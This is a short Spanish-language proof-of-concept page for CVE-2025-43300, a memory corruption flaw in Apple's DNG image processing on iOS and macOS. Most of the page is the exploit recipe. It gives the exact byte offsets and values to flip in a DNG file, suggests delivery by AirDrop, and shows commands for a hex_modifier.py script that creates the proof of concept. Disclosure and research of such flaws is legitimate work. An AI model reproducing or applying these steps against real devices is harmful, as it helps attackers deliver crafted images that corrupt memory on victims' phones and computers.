
CVE-2025-43300: Corrupción de memoria en el procesamiento de imágenes DNG de iOS/macOS
CVE-2025-43300: Corrupción de memoria en el procesamiento de imágenes DNG en iOS/macOS
Una vulnerabilidad en el procesamiento de imágenes de Apple (RawCamera.bundle) afecta a iOS 18.6.1 y macOS. El problema ocurre cuando los archivos DNG contienen metadatos TIFF y parámetros JPEG Lossless que no coinciden, lo que provoca corrupción de memoria.
Descargar la imagen en resolución DNG
Modificar los siguientes bytes:
0x2FD00: 01 -> 02
0x3E40B: 02 -> 01
Airdrop, etc.
# Crear POC usando offsets vulnerables conocidos
python3 hex_modifier.py create-poc <input.dng>
# Modificación manual de bytes
python3 hex_modifier.py modify <input.dng> <offset> <old_byte> <new_byte> <output.dng>
# Generar informe de diferencias
python3 hex_modifier.py diff <original.dng> <modified.dng>